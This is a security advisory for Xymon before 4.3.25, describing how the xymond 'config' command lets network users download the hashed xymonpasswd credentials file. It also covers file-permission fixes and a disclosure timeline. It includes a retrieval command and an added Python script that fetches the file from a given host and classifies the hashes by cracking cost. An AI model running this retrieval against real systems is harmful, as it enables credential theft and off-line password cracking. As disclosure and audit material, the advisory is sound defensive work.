Software

Xymon http://xymon.sourceforge.net/

Versions affected: All 4.3 versions prior to 4.3.25 as well as 4.1.x and 4.2.x

Access to possibly confidential files in the Xymon configuration directory

The xymond daemon allows anyone with network access to the xymond network port (1984) to download configuration files from the Xymon “etc” directory. In a default installation, the Apache htpasswd file “xymonpasswd”, which controls access to the administrator web pages, is installed in this directory and is therefore available for download. The passwords in the file are hashed, but the hashes can be brute-forced off-line. The bug can be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the “--status-senders” option (a non-default configuration).

Technical Background
It is possible to retrieve sensitive data via the network. The xymonpasswd file stores the authentication credentials for the web application. By default this file is placed in the “etc” directory and is readable by the xymond daemon. The xymon client tool can be used to retrieve configuration files from a running Xymon daemon, so it can be misused to return the hashed credentials for the web application. From a host on the same network the htpasswd file can be retrieved with the following command:

./xymon 10.10.10.10 "config xymonpasswd"

An attacker thus obtains the legitimate user names directly and can crack the returned hashes off-line.

Solution
Administrators of existing installations should ensure that the xymonpasswd file is not readable by the userid running the xymond daemon. Permissions should be: owner = webserver UID, group = webserver GID, mode rw------- (600). This will be the default configuration starting with Xymon 4.3.25. In addition, starting with 4.3.25 the “config” command will only return regular files, and by default only files ending in “.cfg” may be retrieved directly. The administrator can override this restriction, and configuration files may still include other files and directories using the existing include directives.

Alternatively, the file may be moved to a location outside the Xymon configuration directory. The Xymon cgioptions.cfg file must then be edited so that CGI_USERADM_OPTS and CGI_CHPASSWD_OPTS include “--passwdfile=FILENAME”.
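The following audit helper is an added example written for this page; it is not code from the advisory or from the Xymon project. It covers both the retrieval described under Technical Background and the permission requirement under Solution: fetch_config speaks the xymond protocol (connect to port 1984, send the message, half-close, read until EOF), parse_htpasswd and classify_hash show what an attacker learns from the returned file, and check_passwd_file_mode verifies the recommended mode 600 / not-owned-by-xymond state. All function names, the SAMPLE_RESPONSE contents and the hash values are constructed assumptions for illustration, not data from any real installation.

```python
"""Audit helper for the Xymon "config" file-disclosure issue (added example)."""
import os
import socket
import stat
import tempfile
from typing import Dict, List, Optional, Tuple

# Xymon's network protocol is plain text: the client connects to xymond,
# sends the message, half-closes the socket and reads the reply until EOF.
# This reproduces the retrieval the advisory performs with the xymon CLI.
def fetch_config(host: str, filename: str, port: int = 1984,
                 timeout: float = 5.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"config {filename}".encode())
        sock.shutdown(socket.SHUT_WR)  # signals end of request to xymond
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


# Constructed sample of what a "config xymonpasswd" reply looks like.
SAMPLE_RESPONSE = """\
admin:$apr1$VbvqZGI7$vo7Q7JsgnC6fR3kHMGJP51
monitor:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
ops:$2y$05$U4DM3eYVjO9nHzKzB9rmbOrWzKZyr2RL7wyI3WYiHRMtVd9Tn4jNS
"""


def classify_hash(h: str) -> str:
    """Name the htpasswd hash scheme so the off-line cracking cost can be judged."""
    if h.startswith("$apr1$"):
        return "apr1-md5"        # Apache MD5 variant, cheap to brute-force
    if h.startswith("{SHA}"):
        return "sha1-unsalted"   # unsalted SHA-1, weakest scheme in the set
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"          # slow hash, cracking is expensive
    if len(h) == 13:
        return "crypt-des"       # traditional crypt(3), 8-character limit
    return "unknown"


def parse_htpasswd(text: str) -> List[Tuple[str, str, str]]:
    """Parse htpasswd-format lines into (username, hash, scheme) triples."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, pwhash = line.split(":", 1)
        entries.append((user, pwhash, classify_hash(pwhash)))
    return entries


def check_passwd_file_mode(path: str,
                           daemon_uid: Optional[int] = None) -> Dict[str, object]:
    """Check the advisory's recommendation: mode 600, not owned by xymond's UID."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    readable_by_others = bool(mode & (stat.S_IRGRP | stat.S_IROTH))
    owned_by_daemon = daemon_uid is not None and st.st_uid == daemon_uid
    return {
        "mode": oct(mode),
        "group_or_world_readable": readable_by_others,
        "owned_by_daemon_uid": owned_by_daemon,
        "ok": mode == 0o600 and not owned_by_daemon,
    }


def audit_temp_copy(mode: int) -> Dict[str, object]:
    """Create a throwaway file with the given mode and audit it (demonstration only)."""
    fd, path = tempfile.mkstemp()
    try:
        os.close(fd)
        os.chmod(path, mode)
        return check_passwd_file_mode(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    import sys
    # With a host argument, query a live xymond (assumed reachable); otherwise use the sample.
    text = fetch_config(sys.argv[1], "xymonpasswd") if len(sys.argv) > 1 else SAMPLE_RESPONSE
    for user, _, scheme in parse_htpasswd(text):
        print(f"{user}: {scheme}")
    print("mode 600 audit:", audit_temp_copy(0o600))
    print("mode 644 audit:", audit_temp_copy(0o644))
```

Run it against a pre-4.3.25 daemon and the user list and hash schemes come back exactly as the advisory describes; against a patched daemon, the request for a file not ending in “.cfg” is refused. The mode check is only half of the fix: a 600 file owned by the xymond user is still readable by the daemon, which is why the function also takes the daemon's UID.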

Time Line

2016-01-08 – Reported vulnerability to authors

2016-02-08 – Vulnerability has been fixed in Xymon version 4.3.25.

Resources

https://sourceforge.net/p/xymon/news/2016/02/xymon-4325-released---security-update/